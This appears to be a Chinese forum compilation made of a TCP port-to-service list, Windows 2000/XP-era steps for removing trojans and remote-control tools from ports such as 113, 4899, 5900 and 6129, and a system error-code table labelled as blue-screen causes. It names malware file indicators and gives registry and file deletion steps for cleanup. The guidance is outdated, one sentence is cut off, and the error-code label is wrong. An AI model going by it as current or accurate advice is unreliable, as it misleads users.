1660/tcp skip-mc-gikreq skip-mc-gikreq
1661/tcp netview-aix-1 netview-aix-1
1662/tcp netview-aix-2 netview-aix-2
1663/tcp netview-aix-3 netview-aix-3
1664/tcp netview-aix-4 netview-aix-4
1665/tcp netview-aix-5 netview-aix-5
1666/tcp netview-aix-6 netview-aix-6
1667/tcp netview-aix-7 netview-aix-7
1668/tcp netview-aix-8 netview-aix-8
1669/tcp netview-aix-9 netview-aix-9
1670/tcp netview-aix-10 netview-aix-10
1671/tcp netview-aix-11 netview-aix-11
1672/tcp netview-aix-12 netview-aix-12
1673/tcp proshare-mc-1 Intel Proshare Multicast
1674/tcp proshare-mc-2 Intel Proshare Multicast
1675/tcp pdp Pacific Data Products
1676/tcp netcomm1 netcomm1
1677/tcp groupwise groupwise
1678/tcp prolink prolink
1679/tcp darcorp-lm darcorp-lm
1681/tcp sd-elmd sd-elmd
1682/tcp lanyon-lantern lanyon-lantern
1683/tcp ncpm-hip ncpm-hip
1684/tcp snaresecure SnareSecure
1685/tcp n2nremote n2nremote
1686/tcp cvmon cvmon
1687/tcp nsjtp-ctrl nsjtp-ctrl
1688/tcp nsjtp-data nsjtp-data
1689/tcp firefox firefox
1690/tcp ng-umds ng-umds
1691/tcp empire-empuma empire-empuma
1692/tcp sstsys-lm sstsys-lm
1693/tcp rrirtr rrirtr
1694/tcp rrimwm rrimwm
1695/tcp rrilwm rrilwm
1696/tcp rrifmm rrifmm
1697/tcp rrisat rrisat
1698/tcp rsvp-encap-1 RSVP-ENCAPSULATION-1
1699/tcp rsvp-encap-2 RSVP-ENCAPSULATION-2
1700/tcp mps-raft mps-raft
1701/tcp l2f,l2tp l2f,l2tp
1702/tcp deskshare deskshare
1703/tcp hb-engine hb-engine
1704/tcp bcs-broker bcs-broker
1705/tcp slingshot slingshot
1706/tcp jetform jetform
1707/tcp vdmplay vdmplay
1708/tcp gat-lmd gat-lmd
1709/tcp centra centra
1710/tcp impera impera
1711/tcp pptconference pptconference
1712/tcp registrar resource monitoring service
1713/tcp conferencetalk ConferenceTalk
1714/tcp sesi-lm sesi-lm
1715/tcp houdini-lm houdini-lm
1716/tcp xmsg xmsg
1717/tcp fj-hdnet fj-hdnet
1718/tcp h323gatedisc h323gatedisc
1719/tcp h323gatestat h323gatestat
1720/tcp h323hostcall h323hostcall
1721/tcp caicci caicci
1722/tcp hks-lm HKS License Manager
1723/tcp pptp pptp
1724/tcp csbphonemaster csbphonemaster
1725/tcp iden-ralp iden-ralp
1726/tcp iberiagames IBERIAGAMES
1727/tcp winddx winddx
1728/tcp telindus TELINDUS
1729/tcp citynl CityNL License Management
1730/tcp roketz roketz
1731/tcp msiccp MSICCP
1732/tcp proxim proxim
1733/tcp siipat SIMS - SIIPAT Protocol for Alarm Transmission
1734/tcp cambertx-lm Camber Corporation License Management
1735/tcp privatechat PrivateChat
1736/tcp street-stream street-stream
1737/tcp ultimad ultimad
1738/tcp gamegen1 GameGen1
1739/tcp webaccess webaccess
1740/tcp encore encore
1741/tcp cisco-net-mgmt cisco-net-mgmt
1742/tcp 3Com-nsd 3Com-nsd
1743/tcp cinegrfx-lm Cinema Graphics License Manager
1744/tcp ncpm-ft ncpm-ft
1745/tcp remote-winsock remote-winsock
1746/tcp ftrapid-1 ftrapid-1
1747/tcp ftrapid-2 ftrapid-2
1748/tcp oracle-em1 oracle-em1
1749/tcp aspen-services aspen-services
1750/tcp sslp Simple Socket Library‘s PortMaster
1751/tcp swiftnet SwiftNet
1752/tcp lofr-lm Leap of Faith Research License Manager
1753/tcp translogic-lm Translogic License Manager
1754/tcp oracle-em2 oracle-em2
1755/tcp ms-streaming ms-streaming
1756/tcp capfast-lmd capfast-lmd
1757/tcp cnhrp cnhrp
1758/tcp tftp-mcast tftp-mcast
1759/tcp spss-lm SPSS License Manager
1760/tcp www-ldap-gw www-ldap-gw
1761/tcp cft-0 cft-0
1762/tcp cft-1 cft-1
1763/tcp cft-2 cft-2
1764/tcp cft-3 cft-3
1765/tcp cft-4 cft-4
1766/tcp cft-5 cft-5
1767/tcp cft-6 cft-6
1768/tcp cft-7 cft-7
1769/tcp bmc-net-adm bmc-net-adm
1770/tcp bmc-net-svc bmc-net-svc
1771/tcp vaultbase vaultbase
1772/tcp essweb-gw EssWeb Gateway
1773/tcp kmscontrol KMSControl
1774/tcp global-dtserv global-dtserv
1776/tcp femis Federal Emergency Management Information System
1777/tcp powerguardian powerguardian
1779/tcp pharmasoft pharmasoft
1780/tcp dpkeyserv dpkeyserv
1781/tcp answersoft-lm answersoft-lm
1782/tcp hp-hcip hp-hcip
1783/tcp fjris Fujitsu Remote Install Service
1784/tcp finle-lm Finle License Manager
1785/tcp windlm Wind River Systems License Manager
1786/tcp funk-logger funk-logger
1787/tcp funk-license funk-license
1788/tcp psmond psmond
1789/tcp hello hello
1790/tcp nmsp Narrative Media Streaming Protocol
1791/tcp ea1 EA1
1792/tcp ibm-dt-2 ibm-dt-2
1793/tcp rsc-robot rsc-robot
1794/tcp cera-bcm cera-bcm
1795/tcp dpi-proxy dpi-proxy
1796/tcp vocaltec-admin Vocaltec Server Administration
1797/tcp uma UMA
1798/tcp etp Event Transfer Protocol
1799/tcp netrisk NETRISK
1801/tcp msmq Microsoft Message Que
1804/tcp enl ENL
1807/tcp fhsp Fujitsu Hot Standby Protocol
1812/tcp radius RADIUS
1813/tcp radius-acct RADIUS Accounting
1814/tcp tdp-suite TDP Suite
1815/tcp mmpft MMPFT
1816/tcp harp HARP
1818/tcp etftp Enhanced Trivial File Transfer Protocol
1819/tcp plato-lm Plato License Manager
1820/tcp mcagent mcagent
1821/tcp donnyworld donnyworld
1822/tcp es-elmd es-elmd
1823/tcp unisys-lm Unisys Natural Language License Manager
1824/tcp metrics-pas metrics-pas
1850/tcp gsi GSI
1863/tcp msnp MSNP
1865/tcp entp ENTP
1901/tcp fjicl-tep-a Fujitsu ICL Terminal Emulator Program A
1902/tcp fjicl-tep-b Fujitsu ICL Terminal Emulator Program B
1903/tcp linkname Local Link Name Resolution
1904/tcp fjicl-tep-c Fujitsu ICL Terminal Emulator Program C
1905/tcp sugp Secure UP.Link Gateway Protocol
1906/tcp tpmd TPortMapperReq
1908/tcp dawn Dawn
1911/tcp mtp Starlight Networks Multimedia Transport Protocol
1913/tcp armadp armadp
1914/tcp elm-momentum Elm-Momentum
1915/tcp facelink FACELINK
1916/tcp persona Persoft Persona
1917/tcp noagent nOAgent
1921/tcp noadmin NoAdmin
1944/tcp close-combat close-combat
1945/tcp dialogic-elmd dialogic-elmd
1946/tcp tekpls tekpls
1947/tcp hlserver hlserver
1948/tcp eye2eye eye2eye
1949/tcp ismaeasdaqlive ISMA Easdaq Live
1950/tcp ismaeasdaqtest ISMA Easdaq Test
1951/tcp bcs-lmserver bcs-lmserver
1973/tcp dlsrap Data Link Switching Remote Access Protocol
1985/tcp hsrp Hot Standby Router Protocol
1986/tcp licensedaemon cisco license management
1987/tcp tr-rsrb-p1 cisco RSRB Priority 1 port
1988/tcp tr-rsrb-p2 cisco RSRB Priority 2 port
1989/tcp tr-rsrb-p3 cisco RSRB Priority 3 port
1989/tcp mshnet MHSnet system
1990/tcp stun-p1 cisco STUN Priority 1 port
1991/tcp stun-p2 cisco STUN Priority 2 port
1992/tcp stun-p3 cisco STUN Priority 3 port
1992/tcp ipsendmsg IPsendmsg
1993/tcp snmp-tcp-port cisco SNMP TCP port
1994/tcp stun-port cisco serial tunnel port
1995/tcp perf-port cisco perf port
1996/tcp tr-rsrb-port cisco Remote SRB port
1997/tcp gdp-port cisco Gateway Discovery Protocol
1998/tcp x25-svc-port cisco X.25 service (XOT)
1999/tcp tcp-id-port cisco identification port
2000/tcp callbook
2001/tcp dc
2002/tcp globe
2004/tcp mailbox
2005/tcp berknet
2007/tcp dectalk
2012/tcp ttyinfo
2013/tcp raid-am
2014/tcp troff
2015/tcp cypress
2025/tcp ellpack
2030/tcp device2
2032/tcp blackboard
2033/tcp glogger
2035/tcp imsldoc
2040/tcp lam
2042/tcp isis isis
2044/tcp rimsl
2045/tcp cdfunc
2046/tcp sdfunc
2047/tcp dls
2049/tcp shilp
2049/tcp nfs Network File System - Sun Microsystems
2065/tcp dlsrpn Data Link Switch Read Port Number
2067/tcp dlswpn Data Link Switch Write Port Number
2090/tcp lrp Load Report Protocol
2091/tcp prp PRP
2102/tcp zephyr-srv Zephyr server
2103/tcp zephyr-clt Zephyr serv-hm connection
2104/tcp zephyr-hm Zephyr hostmanager
2105/tcp minipay MiniPay
2200/tcp ici ICI
2201/tcp ats Advanced Training System Program
2213/tcp kali Kali
2222/tcp unreg-ab2 Allen-Bradley unregistered port
2232/tcp ivs-video IVS Video default
2234/tcp directplay DirectPlay
2236/tcp nani Nani
2240/tcp recipe RECIPe
2241/tcp ivsd IVS Daemon
2242/tcp foliocorp Folio Remote Server
2279/tcp xmquery xmquery
2280/tcp lnvpoller LNVPOLLER
2281/tcp lnvconsole LNVCONSOLE
2282/tcp lnvalarm LNVALARM
2283/tcp lnvstatus LNVSTATUS
2284/tcp lnvmaps LNVMAPS
2285/tcp lnvmailmon LNVMAILMON
2286/tcp nas-metering NAS-Metering
2287/tcp dna DNA
2288/tcp netml NETML
2300/tcp cvmmon CVMMON
2307/tcp pehelp pehelp
2308/tcp sdhelp sdhelp
2313/tcp iapp IAPP (Inter Access Point Protocol)
2316/tcp sent-lm SENT License Manager
2321/tcp rdlap RDLAP over UDP
2322/tcp ofsd ofsd
2323/tcp 3d-nfsd 3d-nfsd
2326/tcp idcp IDCP
2327/tcp xingcsm xingcsm
2329/tcp nvd NVD
2330/tcp tscchat TSCCHAT
2333/tcp snapp SNAPP
2337/tcp ideesrv ideesrv
2344/tcp fcmsys fcmsys
2345/tcp dbm dbm
2356/tcp gxtelmd GXT License Managemant
2358/tcp futrix Futrix
2390/tcp rsmtp RSMTP
2396/tcp wusage Wusage
2397/tcp ncl NCL
2398/tcp orbiter Orbiter
2401/tcp cvspserver cvspserver
2407/tcp orion Orion
2412/tcp cdn CDN
2415/tcp comtest COMTEST
2418/tcp cas cas
2421/tcp g-talk G-Talk
2423/tcp rnrp RNRP
2427/tcp stgcp Simple telephony Gateway Control Protocol
2428/tcp ott One Way Trip Time
2429/tcp ft-role FT-ROLE
2430/tcp venus venus
2432/tcp codasrv codasrv
2436/tcp topx TOP/X
2438/tcp msp MSP
2443/tcp powerclientcsf PowerClient Central Storage Facility
2445/tcp dtn1 DTN1
2447/tcp ovwdb OpenView NNM daemon
2449/tcp ratl RATL
2451/tcp netchat netchat
2458/tcp griffin griffin
2500/tcp rtsserv Resource Tracking system server
2501/tcp rtsclient Resource Tracking system client
2528/tcp ncr_ccl NCR CCL
2529/tcp utsftp UTS FTP
2532/tcp ovtopmd OVTOPMD
2592/tcp netrek netrek
2628/tcp dict DICT
2634/tcp pk-electronics PK Electronics
2636/tcp solve Solve
2639/tcp aminet AMInet
2641/tcp hdl-srv HDL Server
2642/tcp tragic Tragic
2646/tcp and-lm AND Licence Manager
2653/tcp sonus Sonus
2655/tcp unglue UNIX Nt Glue
2656/tcp kana Kana
2700/tcp tqdata tqdata
2784/tcp www-dev world wide web - development
2785/tcp aic-np aic-np
2786/tcp aic-oncrpc aic-oncrpc - Destiny MCD database
2787/tcp piccolo piccolo - Cornerstone Software
2788/tcp fryeserv NetWare Loadable Module - Seagate Software
2789/tcp media-agent Media Agent
2908/tcp mao mao
2912/tcp epicon Epicon
2971/tcp netclip Net Clip
2974/tcp signal Signal
2975/tcp fjmpcm Fujitsu Configuration Management Service
3000/tcp hbci HBCI
3001/tcp redwood-broker Redwood Broker
3003/tcp cgms CGMS
3010/tcp gw Telerate Workstation
3012/tcp twsdss Trusted Web Client
3020/tcp cifs CIFS
3047/tcp hlserver Fast Security HL Server
3048/tcp pctrader Sierra Net PC Trader
3049/tcp nsws NSWS
3105/tcp cardbox Cardbox
3130/tcp icpv2 ICPv2
3141/tcp vmodem VMODEM
3143/tcp seaview Sea View
3147/tcp rfio RFIO
3264/tcp ccmail cc:mail/lotus
3266/tcp ns-cfg-server NS CFG Server
3267/tcp ibm-dial-out IBM Dial Out
3268/tcp msft-gc Microsoft Global Catalog
3273/tcp sxmp Simple Extensible Multiplexed Protocol
3275/tcp samd SAMD
3279/tcp admind admind
3281/tcp sysopt SYSOPT
3284/tcp 4talk 4Talk
3285/tcp plato Plato
3286/tcp e-net E-Net
3288/tcp cops COPS
3289/tcp enpc ENPC
3290/tcp caps-lm CAPS LOGISTICS TOOLKIT - LM
3291/tcp sah-lm S A Holditch & Associates - LM
3293/tcp fg-fps fg-fps
3294/tcp fg-gip fg-gip
3296/tcp rib-slm Rib License Manager
3299/tcp pdrncs pdrncs
3304/tcp opsession-srvr OP Session Server
3306/tcp mysql MySQL
3309/tcp tns-adv TNS ADV
3313/tcp uorb Unify Object Broker
3314/tcp uohost Unify Object Host
3315/tcp cdid CDID
3318/tcp ssrip Swith to Swith Routing Information Protocol
3319/tcp sdt-lmd SDT License Manager
3321/tcp vnsstr VNSSTR
3326/tcp sftu SFTU
3327/tcp bbars BBARS
3328/tcp egptlm Eaglepoint License Manager
3329/tcp hp-device-disc HP Device Disc
3330/tcp mcs-calypsoicf MCS Calypso ICF
3333/tcp dec-notes DEC Notes
3338/tcp anet-b OMF data b
3339/tcp anet-l OMF data l
3340/tcp anet-m OMF data m
3341/tcp anet-h OMF data h
3342/tcp webtie WebTIE
3351/tcp btrieve BTRIEVE
3352/tcp ssql SSQL
3353/tcp fatpipe FATPIPE
3354/tcp suitjd SUITJD
3362/tcp dj-ilm DJ ILM
3372/tcp tip2 TIP 2
3378/tcp wsicopy WSICOPY
3379/tcp socorfs SOCORFS
3381/tcp geneous Geneous
3383/tcp esp-lm Enterprise Software Products License Manager
3390/tcp dsc Distributed Service Coordinator
3391/tcp savant SAVANT
3392/tcp efi-lm EFI License Management
3395/tcp dyna-lm Dyna License Manager (Elam)
3421/tcp bmap Bull Apprise portmapper
3455/tcp prsvp RSVP Port
3456/tcp vat VAT default data
3457/tcp vat-control VAT default control
3900/tcp udt_os Unidata UDT OS
3984/tcp mapper-nodemgr MAPPER network node manager
3985/tcp mapper-mapethd MAPPER TCP/IP server
3986/tcp mapper-ws_ethd MAPPER workstation server
4001/tcp newoak NewOak
4008/tcp netcheque NetCheque accounting
4096/tcp bre BRE (Bridge Relay Element)
4132/tcp nuts_dem NUTS Daemon
4133/tcp nuts_bootp NUTS Bootp Server
4143/tcp oidsr document.nbspReplication
4321/tcp rwhois Remote Who Is
4343/tcp unicall UNICALL
4346/tcp elanlm ELAN LM
4348/tcp itose ITOSE
4444/tcp krb524 KRB524
4444/tcp nv-video NV Video default
4446/tcp n1-fwp N1-FWP
4449/tcp privatewire PrivateWire
4450/tcp camp Camp
4451/tcp ctisystemmsg CTI System Msg
4452/tcp ctiprogramload CTI Program Load
4500/tcp sae-urn sae-urn
4501/tcp urn-x-cdchoice urn-x-cdchoice
4546/tcp sf-lm SF License Manager (Sentinel)
4672/tcp rfa remote file access server
4800/tcp iims Icona Instant Messenging System
4801/tcp iwec Icona Web Embedded Chat
4802/tcp ilss Icona License System Server
4827/tcp htcp HTCP
4868/tcp phrelay Photon Relay
4885/tcp abbs ABBS
5002/tcp rfe radio free ethernet
5003/tcp fmpro-internal FileMaker, Inc. - Proprietary transport
5004/tcp avt-profile-1 avt-profile-1
5005/tcp avt-profile-2 avt-profile-2
5010/tcp telelpathstart TelepathStart
5020/tcp zenginkyo-1 zenginkyo-1
5021/tcp zenginkyo-2 zenginkyo-2
5050/tcp mmcc multimedia conference control tool
5060/tcp sip SIP
5150/tcp atmp Ascend Tunnel Management Protocol
5190/tcp aol America-Online
5191/tcp aol-1 AmericaOnline1
5192/tcp aol-2 AmericaOnline2
5193/tcp aol-3 AmericaOnline3
5272/tcp pk PK
5300/tcp hacl-hb # HA cluster heartbeat
5301/tcp hacl-gs # HA cluster general services
5304/tcp hacl-local # HA Cluster Commands
5305/tcp hacl-test # HA Cluster Test
5307/tcp sco-aip SCO AIP
5310/tcp outlaws Outlaws
5311/tcp tmlogin TM Login
5400/tcp excerpt Excerpt Search
5402/tcp mftp MFTP
5404/tcp hpoms-dps-lstn HPOMS-DPS-LSTN
5407/tcp foresyte-clear Foresyte-Clear
5409/tcp salient-dtasrv Salient Data Server
5410/tcp salient-usrmgr Salient User Manager
5411/tcp actnet ActNet
5414/tcp statusd StatusD
5418/tcp mcntp MCNTP
5419/tcp dj-ice DJ-ICE
5500/tcp fcp-addr-srvr1 fcp-addr-srvr1
5501/tcp fcp-addr-srvr2 fcp-addr-srvr2
5502/tcp fcp-srvr-inst1 fcp-srvr-inst1
5503/tcp fcp-srvr-inst2 fcp-srvr-inst2
5504/tcp fcp-cics-gw1 fcp-cics-gw1
5555/tcp personal-agent Personal Agent
5602/tcp a1-msc A1-MSC
5603/tcp a1-bs A1-BS
5631/tcp pcanywheredata pcANYWHEREdata
5632/tcp pcanywherestat pcANYWHEREstat
5678/tcp rrac Remote Replication Agent Connection
5679/tcp dccm Direct Cable Connect Manager
5713/tcp proshareaudio proshare conf audio
5714/tcp prosharevideo proshare conf video
5715/tcp prosharedata proshare conf data
5717/tcp prosharenotify proshare conf notify
5729/tcp openmail Openmail User Agent Layer
5741/tcp ida-discover1 IDA Discover Port 1
5742/tcp ida-discover2 IDA Discover Port 2
5745/tcp fcopy-server fcopy-server
5746/tcp fcopys-server fcopys-server
5755/tcp openmailg OpenMail Desk Gateway server
5757/tcp x500ms OpenMail X.500 Directory Server
5766/tcp openmailns OpenMail NewMail Server
5767/tcp s-openmail OpenMail Suer Agent Layer (Secure)
6000/tcp x11 X Window System
6110/tcp softcm HP SoftBench CM
6111/tcp spc HP SoftBench Sub-Process Control
6112/tcp dtspcd dtspcd
6123/tcp backup-express Backup Express
6141/tcp meta-corp Meta Corporation License Manager
6142/tcp aspentec-lm Aspen Technology License Manager
6143/tcp watershed-lm Watershed License Manager
6144/tcp statsci1-lm StatSci License Manager - 1
6145/tcp statsci2-lm StatSci License Manager - 2
6146/tcp lonewolf-lm Lone Wolf Systems License Manager
6147/tcp montage-lm Montage License Manager
6148/tcp ricardo-lm Ricardo North America License Manager
6149/tcp tal-pod tal-pod
6253/tcp crip CRIP
6389/tcp clariion-evr01 clariion-evr01
6500/tcp boks BoKS Master
6558/tcp xdsxdm
6665/tcp ircu IRCU
6670/tcp vocaltec-gold Vocaltec Global Online Directory
6672/tcp vision_server vision_server
6673/tcp vision_elmd vision_elmd
6790/tcp hnmp HNMP
6831/tcp ambit-lm ambit-lm
6969/tcp acmsoda acmsoda
7010/tcp ups-onlinet onlinet uninterruptable power supplies
7020/tcp dpserve DP Serve
7070/tcp arcp ARCP
7099/tcp lazy-ptop lazy-ptop
7100/tcp font-service X Font Service
7121/tcp virprot-lm Virtual Prototypes License Manager
7174/tcp clutild Clutild
7200/tcp fodms FODMS FLIP
7201/tcp dlip DLIP
7395/tcp winqedit winqedit
7426/tcp pmdmgr OpenView DM Postmaster Manager
7430/tcp xmpv7 OpenView DM xmpv7 api pipe
7431/tcp pmd OpenView DM ovc/xmpv3 api pipe
7491/tcp telops-lmd telops-lmd
7511/tcp pafec-lm pafec-lm
7544/tcp nta-ds FlowAnalyzer DisplayServer
7545/tcp nta-us FlowAnalyzer UtilityServer
7588/tcp sun-lm Sun License Manager
7777/tcp cbt cbt
7781/tcp accu-lmgr accu-lmgr
7932/tcp t2-drm Tier 2 Data Resource Manager
7933/tcp t2-brm Tier 2 Business Rules Manager
7999/tcp irdmi2 iRDMI2
8000/tcp irdmi iRDMI
8032/tcp pro-ed ProEd
8400/tcp cvd cvd
8401/tcp sabarsd sabarsd
8402/tcp abarsd abarsd
8403/tcp admind admind
8450/tcp npmp npmp
8473/tcp vp2p Vitual Point to Point
8888/tcp ddi-tcp-1 NewsEDGE server TCP (TCP 1)
8889/tcp ddi-tcp-2 Desktop Data TCP 1
8890/tcp ddi-tcp-3 Desktop Data TCP 2
8891/tcp ddi-tcp-4 Desktop Data TCP 3: NESS application
8892/tcp ddi-tcp-5 Desktop Data TCP 4: FARM product
8893/tcp ddi-tcp-6 Desktop Data TCP 5: NewsEDGE/Web application
8894/tcp ddi-tcp-7 Desktop Data TCP 6: COAL application
9000/tcp cslistener CSlistener
9006/tcp sctp SCTP
9090/tcp websm WebSM
9535/tcp man
9594/tcp msgsys Message System
9595/tcp pds Ping Discovery Service
9876/tcp sd Session Director
9992/tcp palace Palace
9993/tcp palace Palace
9994/tcp palace Palace
9995/tcp palace Palace
9996/tcp palace Palace
9997/tcp palace Palace
9998/tcp distinct32 Distinct32
9999/tcp distinct distinct
10000/tcp ndmp Network Data Management Protocol
11000/tcp irisa IRISA
11001/tcp metasys Metasys
12753/tcp tsaf tsaf port
13160/tcp i-zipqd I-ZIPQD
13720/tcp bprd BPRD Protocol (VERITAS NetBackup)
13721/tcp bpbrm BPBRM Protocol (VERITAS NetBackup)
13782/tcp bpcd VERITAS NetBackup
17219/tcp chipper Chipper
18000/tcp biimenu Beckman Instruments, Inc.
19410/tcp hp-sco hp-sco
19411/tcp hp-sca hp-sca
19541/tcp jcp JCP Client
21845/tcp webphone webphone
21846/tcp netspeak-is NetSpeak Corp. Directory Services
21847/tcp netspeak-cs NetSpeak Corp. Connection Services
21848/tcp netspeak-acd NetSpeak Corp. Automatic Call Distribution
21849/tcp netspeak-cps NetSpeak Corp. Credit Processing System
22273/tcp wnn6 wnn6
22555/tcp vocaltec-wconf Vocaltec Web Conference
22800/tcp aws-brf Telerate Information Platform LAN
22951/tcp brf-gw Telerate Information Platform WAN
24000/tcp med-ltp med-ltp
24004/tcp med-ovw med-ovw
24005/tcp med-ci med-ci
25000/tcp icl-twobase1 icl-twobase1
25001/tcp icl-twobase2 icl-twobase2
25002/tcp icl-twobase3 icl-twobase3
25003/tcp icl-twobase4 icl-twobase4
25004/tcp icl-twobase5 icl-twobase5
25005/tcp icl-twobase6 icl-twobase6
25006/tcp icl-twobase7 icl-twobase7
25007/tcp icl-twobase8 icl-twobase8
25008/tcp icl-twobase9 icl-twobase9
25009/tcp icl-twobase10 icl-twobase10
25793/tcp vocaltec-hos Vocaltec Address Server
26000/tcp quake quake
26208/tcp wnn6-ds wnn6-ds
45678/tcp eba EBA PRISE
47557/tcp dbbrowse Databeam Corporation
47806/tcp ap ALC Protocol
47808/tcp bacnet Building Automation and Control Networks
常用端口关闭方法:
113端口木马的清除(仅适用于windows系统):
这是一个基于irc聊天室控制的木马程序。
1.首先使用netstat -an命令确定自己的系统上是否开放了113端口
2.使用fport命令察看出是哪个程序在监听113端口
fport工具下载
例如我们用fport看到如下结果:
Pid Process Port Proto Path
392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe
我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为
c:\winnt\system32下。
3.确定了木马程序名(就是监听113端口的程序)后,在任务管理器中查找到该进程,
并使用管理器结束该进程。
4.在开始-运行中键入regedit运行注册表管理程序,在注册表里查找刚才找到那个程序,
并将相关的键值全部删掉。
5.到木马程序所在的目录下删除该木马程序。(通常木马还会包括其他一些程序,如
rscan.exe、psexec.exe、ipcpass.dic、ipcscan.txt等,根据
木马程序不同,文件也有所不同,你可以通过察看程序的生成和修改的时间来确定与
监听113端口的木马程序有关的其他程序)
6.重新启动机器。
3389端口的关闭:
首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先
确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。
win2000关闭的方法:
win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,
选中属性选项将启动类型改成手动,并停止该服务。
win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services
服务项,选中属性选项将启动类型改成手动,并停止该服务。
winxp关闭的方法:
在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
4899端口的关闭:
首先说明4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能
算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该服
务是否是你自己开放并且是必需的。如果不是请关闭它。
关闭4899端口:
请在开始-->运行中输入cmd(98以下为command),然后cd C:\winnt\system32(你的系统
安装目录),输入r_server.exe /stop后按回车。
然后在输入r_server /uninstall /silence
到C:\winnt\system32(系统目录)下删除r_server.exe admdll.dll radbrv.dll三个文件
5800,5900端口:
1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置(通常会是c:\winnt\fonts\
explorer.exe)
2.在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可以重新
运行c:\winnt\explorer.exe)
3.删除C:\winnt\fonts\中的explorer.exe程序。
4.删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中的
Explorer项。
5.重新启动机器。
6129端口的关闭:
首先说明6129端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是
一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服务
是否是你自己安装并且是必需的,如果不是请关闭。
关闭6129端口:
选择开始-->设置-->控制面板-->管理工具-->服务
找到DameWare Mini Remote Control项点击右键选择属性选项,将启动类型改成禁用后
停止该服务。
到c:\winnt\system32(系统目录)下将DWRCS.EXE程序删除。
到注册表内将HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DWMRCS表项删除。
1029端口和20168端口:
这两个端口是lovgate蠕虫所开放的后门端口。
蠕虫相关信息请参见:Lovgate蠕虫:http://it.rising.com.cn/newSite/ ... rus/Antivirus_Base/
TopicExplorerPagePackage/lovgate.htm
你可以下载专杀工具:http://it.rising.com.cn/service/ ... ovGate_download.htm
使用方法:下载后直接运行,在该程序运行结束后重起机器后再运行一遍该程序。
45576端口:
这是一个代理软件的控制端口,请先确定该代理软件并非你自己安装(代理软件会给你的机器带
来额外的流量)
关闭代理软件:
1.请先使用fport察看出该代理软件所在的位置
2.在服务中关闭该服务(通常为SkSocks),将该服务关掉。
3.到该程序所在目录下将该程序删除。
对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。
针对使用Windows 9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录”中选择“Microsoft友好登录”,不必选择“Windows网络用户”方式。此外,也不必设置“文件打印共享”
对于Windows NT用户,可以取消NetBIOS与TCP/IP协议的绑定,打开“控制面板”,然后双击“网络”图标,在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”,并重新启动计算机即可。
Windows 2000用户可以使用鼠标右键单击“网络邻居”图标,然后选择“属性”命令,打开“网络和拨号连接”对话框,用鼠标右键单击“本地连接”图标,然后执行“属性”命令,打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”,在打开的对话框中单击[高级]按钮。打开“高级TCP/IP设置”对话框,选择“选项”选项卡,在列表中单击选中“TCP/IP筛选”选项
单击[属性]按钮,在“只允许”单击[添加]按钮,填入除了139之外要用到的端口。
对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”,选择一条空规则,设置数据包方向为“接收”,对方IP地址选“任何地址”,协议设定为“TCP”,本地端口设置为“139到139”,对方端口设置为“0到0”,设置标志位为“SYN”,动作设置为“拦截”,最后单击[确定]按钮,并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了.了解139端口是为了更好地
经常不用的端口可以通过关闭139端口的方法来关闭。
我只是個小小的入門者
WIN98下出现蓝屏是经常事,而这个时候我们做的多是重新启动以恢复操作,但蓝屏的原因是什么?我的机器到底出了什么问题,这时就知其然不知所以然。这个表也许能帮的上你。数 值 叙 述
0 0x0000 操作完成。
1 0x0001 不正确的函数。
2 0x0002 系统找不到指定的文件。
3 0x0003 系级找不到指定的路径。
4 0x0004 系统无法打开文件。
5 0x0005 拒绝存取。
6 0x0006 无效的代码。
7 0x0007 内存控制模块已损坏。
8 0x0008 内存空间不足,无法处理这个指令。
9 0x0009 内存控制模块地址无效。
10 0x000A 环境不正确。
11 0x000B 尝试载入一个格式错误的程序。
12 0x000C 存取码错误。
13 0x000D 资料错误。
14 0x000E 内存空间不够,无法完成这项操作。
15 0x000F 系统找不到指定的硬盘。
16 0x0010 无法移除目录。
17 0x0011 系统无法将文件移到其它的硬盘。
18 0x0012 没有任何文件。
19 0x0013 储存媒体为防写状态。
20 0x0014 系统找不到指定的装置。
21 0x0015 装置尚未就绪。
22 0x0016 装置无法识别指令。
23 0x0017 资料错误(cyclic redundancy check)
24 0x0018 程序发出一个长度错误的指令。
25 0x0019 磁盘机在磁盘找不到持定的磁区或磁轨。
26 0x001A 指定的磁盘或磁盘无法存取。
27 0x001B 磁盘机找不到要求的磁区。
28 0x001C 打印机没有纸。
29 0x001D 系统无法将资料写入指定的磁盘。
30 0x001E 系统无法读取指定的装置。
31 0x001F 连接到系统的某个装置没有作用。
32 0x0020 The process cannot access the file because it is being used byanother process.
33 0x0021 文件的一部份被锁定,现在无法存取。
34 0x0022 磁盘机的磁盘不正确。请将%2(Volume Serial Number: %3)插入磁盘
机%1。
36 0x0024 开启的分享文件数量太多。
38 0x0026 到达文件结尾。
39 0x0027 磁盘已满。
50 0x0032 不支持这种网络要求。
51 0x0033 远端电脑无法使用。
52 0x0034 网络名称重复。
53 0x0035 网络路径找不到。
54 0x0036 网络繁忙。
55 0x0037 The specified network resource or device is no longer available.
56 0x0038 The network BIOS command limit has been reached. 57 0x0039 网卡发生问题。
58 0x003A 指定的服务器无法执行要求的操作。
59 0x003B 网络发生意外的错误。
60 0x003C 远端配接卡不兼容。
61 0x003D 打印机队列已满。
62 0x003E 服务器的空间无法储存等候打印的文件。
63 0x003F 等候打印的文件已经删除。
64 0x0040 指定的网络名称无法使用。
